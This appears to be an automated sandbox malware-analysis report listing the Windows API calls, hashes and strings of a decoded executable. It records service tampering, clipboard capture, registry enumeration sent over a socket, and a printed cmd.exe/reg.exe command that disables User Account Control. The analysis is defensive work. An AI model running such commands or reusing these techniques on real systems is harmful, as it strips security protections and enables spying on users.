                                          • Opcode Fuzzy Hash: 07df79d1def3ea8d0f0114adccc6152b0d50d4d25af5b96514c935137a49def7
                                          • Instruction Fuzzy Hash: 2A51E0B1A042106BCA14FB369D0A66E3655ABC4748F00443FFA09676E2DF7D8E46839E
                                          APIs
                                            • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                          • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                          • GetNativeSystemInfo.KERNEL32(?,0040D2DD,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
                                          • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                            • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                          • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                          • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                            • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                            • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                          • String ID:
                                          • API String ID: 3950776272-0
                                          • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                          • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                          • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                          • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __cftoe
                                          • String ID:
                                          • API String ID: 4189289331-0
                                          • Opcode ID: 8a4c5be280cb6c814f8e43a2c8dbee5c21d103d485289201cbd24c59527051e2
                                          • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                          • Opcode Fuzzy Hash: 8a4c5be280cb6c814f8e43a2c8dbee5c21d103d485289201cbd24c59527051e2
                                          • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                          • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                          • String ID:
                                          • API String ID: 493672254-0
                                          • Opcode ID: 305a945f5ae16c96e2f06c84d41aa4012af85c485f9c974a0b1ca90fe9e389de
                                          • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                          • Opcode Fuzzy Hash: 305a945f5ae16c96e2f06c84d41aa4012af85c485f9c974a0b1ca90fe9e389de
                                          • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                          APIs
                                          • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                          • _free.LIBCMT ref: 004482CC
                                          • _free.LIBCMT ref: 004482F4
                                          • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                          • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                          • _abort.LIBCMT ref: 00448313
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$_free$_abort
                                          • String ID:
                                          • API String ID: 3160817290-0
                                          • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                          • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                          • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                          • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ControlManager
                                          • String ID:
                                          • API String ID: 221034970-0
                                          • Opcode ID: 8eb54fa1672786e09d2219133f0626536d5b5b39631990794a881cefe09f2d9d
                                          • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                          • Opcode Fuzzy Hash: 8eb54fa1672786e09d2219133f0626536d5b5b39631990794a881cefe09f2d9d
                                          • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                          • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ControlManager
                                          • String ID:
                                          • API String ID: 221034970-0
                                          • Opcode ID: 7d40cec447ae271724922458aab5fd3d84dbec4ea928b02c1f03fd5bbfed4507
                                          • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                          • Opcode Fuzzy Hash: 7d40cec447ae271724922458aab5fd3d84dbec4ea928b02c1f03fd5bbfed4507
                                          • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                          • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ControlManager
                                          • String ID:
                                          • API String ID: 221034970-0
                                          • Opcode ID: a0f35f664dbda9af56b5a5da66da559fb3e9fc57b8559f966e995c2fd7636ff5
                                          • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                          • Opcode Fuzzy Hash: a0f35f664dbda9af56b5a5da66da559fb3e9fc57b8559f966e995c2fd7636ff5
                                          • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                          APIs
                                          • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D81
                                            • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                            • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          • RegCloseKey.ADVAPI32(00000000,004660B4,004660B4,00466478,00466478,00000071), ref: 00413EEF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEnumInfoOpenQuerysend
                                          • String ID: (aF$,aF$xdF
                                          • API String ID: 3114080316-1322504040
                                          • Opcode ID: 0b9da50034d62b322c9e97ec7b9b2d740b6e189dbc04b3620652c3da3570e91a
                                          • Instruction ID: 9135d8dbad86ad48596e871537d7b2906c3d36c2a7f97e2d86650b4d09e6d137
                                          • Opcode Fuzzy Hash: 0b9da50034d62b322c9e97ec7b9b2d740b6e189dbc04b3620652c3da3570e91a
                                          • Instruction Fuzzy Hash: E341A0316082406AC324FB26D852AEF72A59FD1348F80883FF54A671D6EF7C5D49866E
                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe,00000104), ref: 00443515
                                          • _free.LIBCMT ref: 004435E0
                                          • _free.LIBCMT ref: 004435EA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$FileModuleName
                                          • String ID: 8(c$C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe
                                          • API String ID: 2506810119-907491793
                                          • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                          • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                          • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                          • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                          APIs
                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                          • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Init_thread_footer__onexit
                                          • String ID: [End of clipboard]$[Text copied to clipboard]$ mG$xdF
                                          • API String ID: 1881088180-3895790603
                                          • Opcode ID: a39ea4b818e0b3528c8bb9c5d7a7518586b356a586ec79917f3024ceca11fa06
                                          • Instruction ID: 5c7e69c9d376070a9f10adc198010d279a990252db190bacd7f595afc81a80c0
                                          • Opcode Fuzzy Hash: a39ea4b818e0b3528c8bb9c5d7a7518586b356a586ec79917f3024ceca11fa06
                                          • Instruction Fuzzy Hash: B5216D31A102198ACB14FBA6D8929EDB375AF54318F10403FE506771E2EF7C6D4ACA8C
                                          APIs
                                          • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                          • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                          • GetLastError.KERNEL32 ref: 0041D611
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ClassCreateErrorLastRegisterWindow
                                          • String ID: 0$MsgWindowClass
                                          • API String ID: 2877667751-2410386613
                                          • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                          • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                          • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                          • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                          APIs
                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                          • CloseHandle.KERNEL32(?), ref: 004077E5
                                          • CloseHandle.KERNEL32(?), ref: 004077EA
                                          Strings
                                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                          • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle$CreateProcess
                                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                          • API String ID: 2922976086-4183131282
                                          • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                          • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                          • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                          • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                          APIs
                                          • RegCreateKeyW.ADVAPI32(80000001,00000000,RG), ref: 0041385A
                                          • RegSetValueExW.ADVAPI32(RG,?,00000000,00000001,00000000,00000000,00475300,?,0040F85E,pth_unenc,004752E8), ref: 00413888
                                          • RegCloseKey.ADVAPI32(?,?,0040F85E,pth_unenc,004752E8), ref: 00413893
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCreateValue
                                          • String ID: pth_unenc$RG
                                          • API String ID: 1818849710-3487042679
                                          • Opcode ID: cbeea3386a39013b062d5e7225ad240eff34055e22739d6872e46d18ef669f40
                                          • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                          • Opcode Fuzzy Hash: cbeea3386a39013b062d5e7225ad240eff34055e22739d6872e46d18ef669f40
                                          • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
                                          • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$mscoree.dll
                                          • API String ID: 4061214504-1276376045
                                          • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                          • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                          • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                          • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          Strings
                                          Memory Dump Source
